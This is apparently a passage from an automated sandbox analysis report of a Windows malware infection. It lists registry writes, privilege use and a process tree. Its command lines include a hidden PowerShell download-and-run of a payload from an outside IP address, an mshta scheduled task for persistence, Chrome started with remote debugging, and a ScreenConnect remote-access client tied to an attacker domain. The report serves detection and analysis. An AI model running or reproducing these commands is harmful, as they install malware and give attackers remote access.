Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2644 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2700 wrote to memory of 2768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2700 wrote to memory of 2708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2708 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2864 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 2568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2568 wrote to memory of 2616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 2992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2700 wrote to memory of 1964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 1964 wrote to memory of 2536 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2536 wrote to memory of 1708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 1708 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1284 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2092 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2092 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2092 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Windows\SysWOW64\WerFault.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat" any_word

C:\Windows\system32\timeout.exe

timeout /t 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\system32\schtasks.exe

schtasks /create /tn "d93aVmafZtV" /tr "mshta \"C:\Temp\2fJgGTIv1.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\system32\mshta.exe

mshta "C:\Temp\2fJgGTIv1.hta"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe

"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"

C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe

"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"

C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe

"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 512

C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe

"C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7829758,0x7fef7829768,0x7fef7829778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1112 --field-trial-handle=1368,i,16591011724913026818,8800948318193845533,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1524 --field-trial-handle=1368,i,16591011724913026818,8800948318193845533,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1596 --field-trial-handle=1368,i,16591011724913026818,8800948318193845533,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2224 --field-trial-handle=1368,i,16591011724913026818,8800948318193845533,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2160 --field-trial-handle=1368,i,16591011724913026818,8800948318193845533,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1416 --field-trial-handle=1368,i,16591011724913026818,8800948318193845533,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1384 --field-trial-handle=1368,i,16591011724913026818,8800948318193845533,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3348 --field-trial-handle=1368,i,16591011724913026818,8800948318193845533,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3604 --field-trial-handle=1368,i,16591011724913026818,8800948318193845533,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe

"C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3492 --field-trial-handle=1368,i,16591011724913026818,8800948318193845533,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe

"C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe"

C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe

"C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 848 -s 504

C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe

"C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\hdj5f" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 11

C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe

"C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"

C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe

"C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 504

C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe

"C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe"

C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe

"C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\3be09d9e5e840c20\ScreenConnect.ClientSetup.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding B68547F334DCA1C474863AADBADB0EF8 C

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI23F5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259531858 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe

"C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe"

C:\Windows\system32\DrvInst.exe

DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000005BC" "00000000000003B8"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding A79654B28112A4B18EDC17244DDED017

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 3133C096E95C5234DCB5CF270969206A M Global\MSI0000

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe

"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=6b3c9f2e-719d-4888-b6ab-03b40b2eb090&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&c=test&c=&c=&c=&c=&c=&c=&c="

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe" "RunRole" "0ebbcca5-b852-4d0b-8dea-78c218d1573b" "User"


C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

